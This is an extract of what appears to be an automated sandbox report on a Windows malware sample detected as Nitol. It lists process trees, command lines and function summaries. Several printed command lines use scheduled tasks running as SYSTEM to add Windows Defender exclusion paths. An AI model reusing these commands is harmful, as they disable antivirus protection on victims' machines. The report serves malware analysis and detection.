MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:11:35
Start date:	11/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff693320000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6d9f50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:11:36
Start date:	11/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff693320000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:12:09
Start date:	11/01/2025
Path:	C:\Program Files (x86)\4fkch1\4fkch1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\4fkch1\4fkch1.exe"
Imagebase:	0x590000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	22:12:11
Start date:	11/01/2025
Path:	C:\Program Files (x86)\4fkch1\4fkch1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\4fkch1\4fkch1.exe"
Imagebase:	0x590000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	22:12:12
Start date:	11/01/2025
Path:	C:\Program Files (x86)\G1f92m\12xy9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\G1f92m\12xy9.exe"
Imagebase:	0x8a0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:12:12
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:12:12
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:12:13
Start date:	11/01/2025
Path:	C:\Program Files (x86)\G1f92m\12xy9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\G1f92m\12xy9.exe"
Imagebase:	0x8a0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:12:13
Start date:	11/01/2025
Path:	C:\Program Files (x86)\4fkch1\4fkch1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\4fkch1\4fkch1.exe"
Imagebase:	0x590000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:13:01
Start date:	11/01/2025
Path:	C:\Program Files (x86)\G1f92m\12xy9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\G1f92m\12xy9.exe"
Imagebase:	0x8a0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	22:13:01
Start date:	11/01/2025
Path:	C:\Program Files (x86)\4fkch1\4fkch1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\4fkch1\4fkch1.exe"
Imagebase:	0x590000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.8%
Total number of Nodes:	466
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006FA2
@, xrefs: 0000000140006D6C

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

s, xrefs: 0000000140005F5F
c, xrefs: 0000000140005F69
p, xrefs: 0000000140005EB1
l, xrefs: 0000000140005F9B
i, xrefs: 0000000140005EC1
t, xrefs: 0000000140005F73
d, xrefs: 0000000140005EE1
d, xrefs: 0000000140005F7D
., xrefs: 0000000140005ED9
l, xrefs: 0000000140005F87
., xrefs: 0000000140005F78
t, xrefs: 0000000140005ED1
s, xrefs: 0000000140005EC9
m, xrefs: 0000000140005F91
l, xrefs: 0000000140005F82
l, xrefs: 0000000140005FA0
a, xrefs: 0000000140005EE9
s, xrefs: 0000000140005EA1
L, xrefs: 0000000140005EB9
o, xrefs: 0000000140005FA5
m, xrefs: 0000000140005F5A
M, xrefs: 0000000140005E99
a, xrefs: 0000000140005F96
r, xrefs: 0000000140005F6E
t, xrefs: 0000000140005EF1
v, xrefs: 0000000140005F64
M, xrefs: 0000000140005EA9
c, xrefs: 0000000140005FAA

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE13201C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE13201C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE13201C7A
_RTC_Initialize.LIBCMT ref: 00007FFE13201CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE13201CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE13201CF9

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 3695f5a7d9a82fdc37271ed5d0d79df2da65dbdb7a5364e60b30a44cec963eb2
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 7E819C24E08F434EFB54BB67954127D6290AFE67A0F2440B6EA0D677B2DE3CF949C600

Function 00007FFE13201720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE13201753
FreeLibrary.KERNEL32 ref: 00007FFE13201981

Part of subcall function 00007FFE13201B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE13201BC0
Part of subcall function 00007FFE13201B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE13201BC6

Part of subcall function 00007FFE13201720: FindFirstFileA.KERNELBASE ref: 00007FFE13201536

Strings

WordpadFilter.db, xrefs: 00007FFE13201527

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 05494675f25e7497f6d9c28bb1fd0425354dc321d0caf4ab2700440da5a2e9bd
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: E2319C32B15F418DE700EBA2D8402AD73A5EBA8798F148635EE8D23B59EF38D155C340

Function 00007FFE132011B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE132014EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE132014F7

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 584a7b5222864ff76b7a15302aa4a08cf586172d8fb7dc69f903e924efa095c6
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: A6814E26A19B924AE6119B36984017DA694FFA6BD4F248335EF59737A2DF3CF091C300

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

SeLoadDriverPrivilege, xrefs: 000000014000402A
null, xrefs: 0000000140003FCE
ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
